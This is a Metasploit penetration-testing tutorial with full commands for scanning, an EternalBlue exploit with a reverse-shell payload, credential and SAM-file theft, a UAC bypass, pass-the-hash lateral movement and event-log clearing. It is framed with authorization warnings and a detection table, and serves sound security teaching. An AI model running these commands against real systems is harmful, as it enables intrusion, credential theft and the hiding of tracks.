Last updated: March 22, 2026

How to Use Metasploit for Authorized Pentesting

Metasploit Framework is the standard toolkit for offensive security professionals. This guide covers conducting a structured penetration test on systems you have explicit written authorization to test. Every command here should only be run against infrastructure you own or have a signed Rules of Engagement document for.

Legal and ethical boundary - Unauthorized use of Metasploit constitutes unauthorized computer access. a felony in the US (CFAA), UK (Computer Misuse Act), EU, and nearly every other jurisdiction. Get written authorization before touching anything.

  1. Install Metasploit Framework
Kali Linux. pre-installed
msfconsole --version

Ubuntu (official installer)
curl -s https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | sudo tee /usr/local/bin/msfinstall
sudo chmod 755 /usr/local/bin/msfinstall
sudo msfinstall

Initialize database (PostgreSQL)
sudo msfdb init
msfconsole
  1. Engagement Workflow

A structured pentest follows these phases:

Reconnaissance → Scanning → Exploitation → Post-Exploitation → Reporting

Always document every action with timestamps. Use Metasploit’s workspaces to separate engagements.

  1. Workspace Setup
msf6> workspace -a client_pentest_2026_03
msf6> workspace client_pentest_2026_03
msf6> workspace
  * client_pentest_2026_03
    default

Workspaces separate hosts, services, and loot by engagement.

  1. Reconnaissance: Port Scanning
msf6> db_nmap -sV -sC -O -p 1-65535 192.168.100.0/24

View discovered hosts
msf6> hosts

View discovered services
msf6> services

Filter by port
msf6> services -p 445

Export for reporting
msf6> hosts -o /tmp/hosts.csv
msf6> services -o /tmp/services.csv

db_nmap runs nmap and automatically imports results into the database.

  1. Search for Relevant Exploits
Search by CVE
msf6> search cve:2021-34527     # PrintNightmare
msf6> search cve:2017-0144      # EternalBlue (MS17-010)

Search by platform and type
msf6> search platform:windows type:exploit name:smb

Search by service
msf6> search type:auxiliary name:ssh

Check exploit score/reliability
msf6> info exploit/windows/smb/ms17_010_eternalblue

Exploit rankings - Excellent > Great > Good > Normal > Average > Low. Prefer Excellent or Great for production tests to minimize system instability.

  1. Example: SMB Vulnerability Check (No Exploitation)

Before exploiting, confirm vulnerability exists:

msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> set RHOSTS 192.168.100.0/24
msf6> set THREADS 10
msf6> run

Output:
[+] 192.168.100.15:445 - Host is likely VULNERABLE to MS17-010!
[-] 192.168.100.16:445 - Host does NOT appear to be vulnerable.
  1. Example: Exploitation with Meterpreter

After written confirmation to proceed beyond discovery:

msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.100.15
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 192.168.100.1     # your attacker IP
msf6> set LPORT 4444
msf6> set VERBOSE true

Preview what will happen before running
msf6> info

Execute
msf6> run

If successful:

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
  1. Post-Exploitation: Evidence Gathering

Collect evidence for the report. screenshots, hash dumps, configuration files:

meterpreter > screenshot                    # capture screen
meterpreter > ps                            # running processes
meterpreter > netstat                       # network connections
meterpreter > run post/multi/recon/local_exploit_suggester   # privilege escalation suggestions

Gather system info
meterpreter > run post/windows/gather/credentials/credential_collector

Check for installed AV
meterpreter > run post/windows/gather/enum_av

File search
meterpreter > search -f *.config -d C:\\
meterpreter > search -f *password* -d C:\\Users\\

Download evidence file
meterpreter > download C:\\Windows\\System32\\config\\SAM /tmp/evidence/
  1. Privilege Escalation
meterpreter > getsystem     # automated local privilege escalation attempt

If getsystem fails:
meterpreter > background
msf6> use post/multi/recon/local_exploit_suggester
msf6> set SESSION 1
msf6> run

Try a suggested exploit
msf6> use exploit/windows/local/bypassuac_eventvwr
msf6> set SESSION 1
msf6> run
  1. Lateral Movement (Authorized Scope Only)

Only attempt lateral movement to hosts explicitly included in the Rules of Engagement:

meterpreter > run post/windows/gather/credentials/hashdump

Use captured hash for pass-the-hash against other hosts in scope
msf6> use exploit/windows/smb/psexec
msf6> set RHOSTS 192.168.100.20
msf6> set SMBUser Administrator
msf6> set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> run
  1. Cleanup (Critical)

Leave systems exactly as you found them:

meterpreter > clearev       # clear Windows event logs
                            # Note - clearing logs is visible to SIEM. discuss with client

Remove any files you dropped
meterpreter > rm C:\\Windows\\Temp\\payload.exe

Terminate sessions cleanly
meterpreter > exit

Remove all handlers
msf6> sessions -K

Back up and clear your workspace data
msf6> db_export -f xml /tmp/client_pentest_2026.xml
  1. Generate a Report
Export all findings to XML
msfconsole -q -x "workspace client_pentest_2026_03; \
  db_export -f xml /tmp/pentest_data.xml; exit"

Use Dradis (open-source pentest reporting tool) to build the report
sudo gem install dradis

Recommended report structure:
1. Executive Summary
2. Scope and Methodology
3. Critical Findings (with CVSS scores, evidence screenshots)
4. High / Medium / Low Findings
5. Remediation Roadmap
6. Testing Timeline (every command, every timestamp)

Automation - Resource Scripts

Metasploit resource scripts automate repeated tasks:

/tmp/smb_scan.rc
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS file:/tmp/targets.txt
set THREADS 20
run
exit

msfconsole -r /tmp/smb_scan.rc

Defense Correlation

Every action in this guide should be detectable. Use this to validate your defenses:

Offensive Action Expected Detection
db_nmap port scan IDS alert, firewall log
EternalBlue exploit attempt Snort/Suricata SMB rule
Meterpreter reverse shell EDR process injection alert
hashdump Wazuh Windows event 4624 + 4688
clearev Wazuh event 1102 (audit log cleared)

Related Reading

Built by theluckystrike. More at zovo.one